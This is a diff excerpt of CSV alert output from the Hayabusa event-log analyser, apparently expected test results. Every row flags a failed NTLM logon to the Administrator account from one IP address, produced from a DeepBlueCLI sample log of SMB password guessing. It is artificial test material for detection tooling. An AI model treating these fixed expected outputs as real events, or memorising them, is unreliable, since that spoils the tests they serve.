+2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsZy0Yjvk720Mu22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RusStjhReKBmS0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eJuPYLTcGaGvErLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: raCbua01mzU1Djuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fnt8atAbMtxXivUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: psokvQJyMn5m5rMh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wTPGqOITsOhpTgIF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xxhGrLzhwNziihc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UIb1lHuPaC62UlBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2uvXuLIR9yvmWngF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MI35CCybjNtntfwo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GTJfOkk0fUC5YCX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jk6PsiAiLPsHGUh1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KeGDMp9My5eLJz55 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BvDQphjvwOCsNQqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJhad4aocvPMYVP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJl3XqTUxvqiKKaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1fAJDfguuoNxWiR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daAeGcsqoqERsEu6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0iynnwxS8v4C5b3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2kU7IS4XCvgRpTff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MBC8AJXBQHrCMrO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NSGraDQmI4MAq9Ls | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7u2Pb9y8hB0iYWh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A657rbd6k4AD7M4i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7rkiDUBuTCU2jDXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jjsCFTQoobrkQoWF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dNXav95nZyBhVOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yeq1x56Ct6R2Nu3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pUwyCNtwydEQu2bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bX7eihAOk3PUgbwM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPXqAsaYaXEr8I9L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4SaEmIpmlH1VMDun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3Dvp43a2h7Mzx2H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g3voKlRXc7rIaIYs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GF1Q5OhCLRAi96mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: caHe4iY2CQoiumQI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJi6UAm6Pp6eax8Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EW0t2wapD8yniO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PnaITXTihpB0stwx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tdBVoa82WKEAW2ce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BelKzJrEjGIcU2dN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ujeb7fRHPGCGmFm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Czwt7KF2sQHemwdJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LQQ4nNpbfKKVCJZH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6jwIc6e0AHAhXKK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nld9Job0Ll1Fgtmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9sS6i9iU3PXhokz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heaYv6Np8swhoVc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7rzgNBtUJkS93pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh45suNQ09FzPBjd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BOnwAGxxz994k6Ee | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L26mvUKOgGptcKaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aqldRjcLl8KFZr5h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ycNPBtmRHShPOcRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ISlMGsVvXry0rbju | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MjGjh70EQ5YVGJUt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yaYM5N2kuvuRCHRU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 32wgj2t7BLBviVxd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vr1kMRxLEaCIWIbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4PHEJyKgp5wXRtBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbaoz8rTZVXUjRAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d4eD3JQ5gquIqgND | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9slFFSSXhFxPqG1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDb5Up4KwJj0hN5n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxqIpDLlnf6Xyc34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTCTTYmKTIzzJwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oD3dLxlB3qWIhZEQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fe9xMOoCxPJIIyVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DW3YgBZYiGTeEw66 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VAKeeIcOeiQ3H9NF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmF3ot3gJCsBlSwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDjoResfZvvVqqE5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V4dwzMwvVtzztGwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
